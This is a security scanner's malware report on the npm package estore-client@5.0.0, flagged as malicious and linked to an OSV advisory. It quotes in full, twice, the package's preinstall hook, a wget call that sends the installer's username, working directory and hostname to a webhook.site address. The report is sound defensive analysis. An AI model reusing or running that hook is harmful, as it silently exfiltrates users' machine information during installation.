registry  /  estore-client  /  5.0.0

estore-client@5.0.0

AI Security Review

scanned 13m ago · by lpm-firewall-ai

Installing the package automatically invokes a shell command. The command gathers local user, working-directory, and host information and transmits it to a third-party webhook.

Static reason
One or more suspicious static signals were detected.
Trigger
npm install / preinstall lifecycle execution
Impact
Leaks local environment metadata without user consent during dependency installation.
Mechanism
install-time shell-based host-environment exfiltration via wget
Attack narrative
`package.json` registers a `preinstall` hook that executes automatically during npm installation. It invokes `wget` against a webhook.site URL and embeds the current username, working directory, and hostname in the request query string, exfiltrating installation-host metadata without a package-related purpose.
Rationale
Direct source inspection confirms an unsolicited preinstall-time outbound request containing harvested local metadata. This is concrete install-time data exfiltration, not a benign package function.
Evidence
package.json
Network endpoints1
webhook.site/d32804ac-1bbb-4100-ab60-95231dd3251c/

OSV Corroboration

OpenSSF/OSV
Advisory
MAL-2026-10634
Source
OpenSSF Malicious Packages via OSV
Summary
Direct source inspection confirms an unsolicited preinstall-time outbound request containing harvested local metadata. This is concrete install-time data exfiltration, not a benign package function.
References

Decision evidence

public snapshot
AI called this Malicious at 99.0% confidence as Malware with low false-positive risk.
Evidence for block
  • `package.json` defines a `preinstall` lifecycle hook.
  • The hook runs `wget` to a third-party webhook endpoint.
  • It sends `whoami`, `pwd`, and `hostname` as URL query data.
  • The package contains no source files beyond `package.json`; declared `index.js` is absent.
Evidence against
  • No additional package source or executable payload was present to inspect.
Behavioral surface
SourceNo risky source behavior triggered.
Supply chainNo supply-chain packaging signals triggered.
ManifestNo manifest risk signals triggered.
scanned 0 file(s), 0 B of source

Source & flagged code

2 flagged · loading source
package.jsonView file
scripts.preinstall = wget --quiet "https://webhook.site/d32804ac-1bbb-4100-ab60-95231dd3251c/?user=$(whoami)&path=$(pwd)&hostname=$(hostname)"
High
Install Time Lifecycle Scripts

Package defines install-time lifecycle scripts.

package.jsonView on unpkg
scripts.preinstall = wget --quiet "https://webhook.site/d32804ac-1bbb-4100-ab60-95231dd3251c/?user=$(whoami)&path=$(pwd)&hostname=$(hostname)"
Medium
Ambiguous Install Lifecycle Script

Install-time lifecycle script is not statically allowlisted and needs review.

package.jsonView on unpkg

Findings

1 High1 Medium1 Low
HighInstall Time Lifecycle Scriptspackage.json
MediumAmbiguous Install Lifecycle Scriptpackage.json
LowScripts Present